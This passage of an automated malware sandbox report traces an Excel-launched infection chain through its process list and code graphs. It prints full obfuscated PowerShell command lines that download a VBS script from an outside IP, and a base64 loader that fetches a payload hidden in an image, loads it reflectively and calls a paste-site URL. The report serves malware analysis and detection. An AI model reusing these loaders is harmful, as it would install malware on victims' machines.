                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                    Imagebase:0x13f040000
                                                                                                                    File size:13'824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:04:54:22
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
                                                                                                                    Imagebase:0x4a4b0000
                                                                                                                    File size:345'088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:22
                                                                                                                    Start time:04:54:23
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
                                                                                                                    Imagebase:0x13f510000
                                                                                                                    File size:443'392 bytes
                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:04:54:24
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
                                                                                                                    Imagebase:0x13f7c0000
                                                                                                                    File size:2'758'280 bytes
                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:24
                                                                                                                    Start time:04:54:24
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
                                                                                                                    Imagebase:0x13f050000
                                                                                                                    File size:52'744 bytes
                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:26
                                                                                                                    Start time:04:54:29
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
                                                                                                                    Imagebase:0xff560000
                                                                                                                    File size:168'960 bytes
                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:04:54:33
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
                                                                                                                    Imagebase:0x13f510000
                                                                                                                    File size:443'392 bytes
                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Call Graph

                                                                                                                    • Entrypoint
                                                                                                                    • Decryption Function
                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    • Show Help
                                                                                                                    callgraph 1 Error: Graph is empty

                                                                                                                    Module: Sheet1

                                                                                                                    Declaration
                                                                                                                    LineContent
                                                                                                                    1

                                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                                    2

                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                    3

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    4

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    5

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    6

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    7

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    8

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    9

                                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                                    10

                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                    11

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    12

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    13

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    14

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    15

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    16

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    Module: Sheet2

                                                                                                                    Declaration
                                                                                                                    LineContent
                                                                                                                    1

                                                                                                                    Attribute VB_Name = "Sheet2"

                                                                                                                    2

                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                    3

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    4

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    5

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    6

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    7

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    8

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    9

                                                                                                                    Attribute VB_Name = "Sheet2"

                                                                                                                    10

                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                    11

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    12

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    13

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    14

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    15

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    16

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    Module: ThisWorkbook

                                                                                                                    Declaration
                                                                                                                    LineContent
                                                                                                                    1

                                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                                    2

                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                    3

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    4

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    5

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    6

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    7

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    8

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    9

                                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                                    10

                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                    11

                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                    12

                                                                                                                    Attribute VB_Creatable = False

                                                                                                                    13

                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                    14

                                                                                                                    Attribute VB_Exposed = True

                                                                                                                    15

                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                    16

                                                                                                                    Attribute VB_Customizable = True

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.434753535.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3330000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
                                                                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.434753535.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3330000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
                                                                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:4.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:3
                                                                                                                      Total number of Limit Nodes:0
                                                                                                                      execution_graph 3945 7fe899a7ae1 3946 7fe899a7af1 URLDownloadToFileW 3945->3946 3948 7fe899a7c00 3946->3948

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461422029.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe899a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownloadFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1407266417-0
                                                                                                                      • Opcode ID: 993897efae8a830c036dd869a770a1800415dd3257510746f62ace350109b2ac
                                                                                                                      • Instruction ID: ac6dc93a8c95fbe7c0aa9f0e48ea91792a6eec636a1da9446bde9b6c9f5edd60
                                                                                                                      • Opcode Fuzzy Hash: 993897efae8a830c036dd869a770a1800415dd3257510746f62ace350109b2ac
                                                                                                                      • Instruction Fuzzy Hash: 9C31917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461518646.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V
                                                                                                                      • API String ID: 0-1342839628
                                                                                                                      • Opcode ID: 8cd8447ae7bfe76d280e4d9f5ef01f0b86d21c308720c69c70a039e1c09168f4
                                                                                                                      • Instruction ID: 7a60b087a9bbddf3b07bd8c211990c2ffffadacf7a2321953f87aa9624a52f3d
                                                                                                                      • Opcode Fuzzy Hash: 8cd8447ae7bfe76d280e4d9f5ef01f0b86d21c308720c69c70a039e1c09168f4
                                                                                                                      • Instruction Fuzzy Hash: 5BD1053180E7C91FD34797289C156B67FA4EF87260F0911EBD48DCB0A3D619AD5AC3A2

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461422029.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe899a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownloadFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1407266417-0
                                                                                                                      • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                                                      • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                                                                                      • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                                                      • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 80 7fe89a78549-7fe89a785f9 81 7fe89a78add-7fe89a78b96 80->81 82 7fe89a785ff-7fe89a78609 80->82 83 7fe89a7860b-7fe89a78618 82->83 84 7fe89a78622-7fe89a78629 82->84 83->84 86 7fe89a7861a-7fe89a78620 83->86 87 7fe89a7862b-7fe89a7863e 84->87 88 7fe89a78640 84->88 86->84 89 7fe89a78642-7fe89a78644 87->89 88->89 92 7fe89a78a58-7fe89a78a62 89->92 93 7fe89a7864a-7fe89a78656 89->93 94 7fe89a78a64-7fe89a78a74 92->94 95 7fe89a78a75-7fe89a78a85 92->95 93->81 96 7fe89a7865c-7fe89a78666 93->96 98 7fe89a78a87-7fe89a78a8b 95->98 99 7fe89a78a92-7fe89a78adc 95->99 100 7fe89a78668-7fe89a78675 96->100 101 7fe89a78682-7fe89a78692 96->101 98->99 100->101 102 7fe89a78677-7fe89a78680 100->102 101->92 107 7fe89a78698-7fe89a786cc 101->107 102->101 107->92 112 7fe89a786d2-7fe89a786de 107->112 112->81 113 7fe89a786e4-7fe89a786ee 112->113 114 7fe89a78707-7fe89a7870c 113->114 115 7fe89a786f0-7fe89a786fd 113->115 114->92 116 7fe89a78712-7fe89a78717 114->116 115->114 117 7fe89a786ff-7fe89a78705 115->117 116->92 118 7fe89a7871d-7fe89a78722 116->118 117->114 118->92 119 7fe89a78728-7fe89a78737 118->119 121 7fe89a78747 119->121 122 7fe89a78739-7fe89a78743 119->122 125 7fe89a7874c-7fe89a78759 121->125 123 7fe89a78763-7fe89a787ee 122->123 124 7fe89a78745 122->124 132 7fe89a787f0-7fe89a787fb 123->132 133 7fe89a78802-7fe89a78824 123->133 124->125 125->123 126 7fe89a7875b-7fe89a78761 125->126 126->123 132->133 134 7fe89a78826-7fe89a78830 133->134 135 7fe89a78834 133->135 136 7fe89a78850-7fe89a788de 134->136 137 7fe89a78832 134->137 138 7fe89a78839-7fe89a78846 135->138 145 7fe89a788e0-7fe89a788eb 136->145 146 7fe89a788f2-7fe89a78910 136->146 137->138 138->136 140 7fe89a78848-7fe89a7884e 138->140 140->136 145->146 147 7fe89a78920 146->147 148 7fe89a78912-7fe89a7891c 146->148 151 7fe89a78925-7fe89a78933 147->151 149 7fe89a7893d-7fe89a789cd 148->149 150 7fe89a7891e 148->150 158 7fe89a789cf-7fe89a789da 149->158 159 7fe89a789e1-7fe89a78a3a 149->159 150->151 151->149 152 7fe89a78935-7fe89a7893b 151->152 152->149 158->159 162 7fe89a78a42-7fe89a78a57 159->162
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461518646.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bd37f2e8439cf04c0f35561e7d56f4df3764963948325834d9ca9ade5b41dd12
                                                                                                                      • Instruction ID: 730ffb248186cd28ee04794335b752c6a4b9b2c899447a3a8ec2b51df34c7b93
                                                                                                                      • Opcode Fuzzy Hash: bd37f2e8439cf04c0f35561e7d56f4df3764963948325834d9ca9ade5b41dd12
                                                                                                                      • Instruction Fuzzy Hash: B822F33090CB895FD74ADB2C84916797BE2FF9A344F2401EED48ED72A3EA24AC55C741

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 163 7fe89a74165-7fe89a741f4 164 7fe89a74457-7fe89a74516 163->164 165 7fe89a741fa-7fe89a74204 163->165 166 7fe89a74206-7fe89a74213 165->166 167 7fe89a7421d-7fe89a74222 165->167 166->167 168 7fe89a74215-7fe89a7421b 166->168 170 7fe89a74228-7fe89a7422b 167->170 171 7fe89a743fb-7fe89a74405 167->171 168->167 172 7fe89a7422d-7fe89a74240 170->172 173 7fe89a74242 170->173 174 7fe89a74407-7fe89a74413 171->174 175 7fe89a74414-7fe89a74424 171->175 178 7fe89a74244-7fe89a74246 172->178 173->178 179 7fe89a74426-7fe89a7442a 175->179 180 7fe89a74431-7fe89a74454 175->180 178->171 181 7fe89a7424c-7fe89a74280 178->181 179->180 180->164 187 7fe89a74297 181->187 188 7fe89a74282-7fe89a74295 181->188 190 7fe89a74299-7fe89a7429b 187->190 188->190 190->171 192 7fe89a742a1-7fe89a742a9 190->192 192->164 193 7fe89a742af-7fe89a742b9 192->193 194 7fe89a742bb-7fe89a742c8 193->194 195 7fe89a742d5-7fe89a742e5 193->195 194->195 196 7fe89a742ca-7fe89a742d3 194->196 195->171 199 7fe89a742eb-7fe89a7431c 195->199 196->195 199->171 202 7fe89a74322-7fe89a7434e 199->202 204 7fe89a74350-7fe89a74372 202->204 205 7fe89a74374 202->205 206 7fe89a74376-7fe89a74378 204->206 205->206 206->171 208 7fe89a7437e-7fe89a74386 206->208 209 7fe89a74396 208->209 210 7fe89a74388-7fe89a74392 208->210 214 7fe89a7439b-7fe89a743a8 209->214 211 7fe89a743b2-7fe89a743e1 210->211 212 7fe89a74394 210->212 218 7fe89a743e8-7fe89a743fa 211->218 212->214 214->211 215 7fe89a743aa-7fe89a743b0 214->215 215->211
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.461518646.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7fe89a70000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
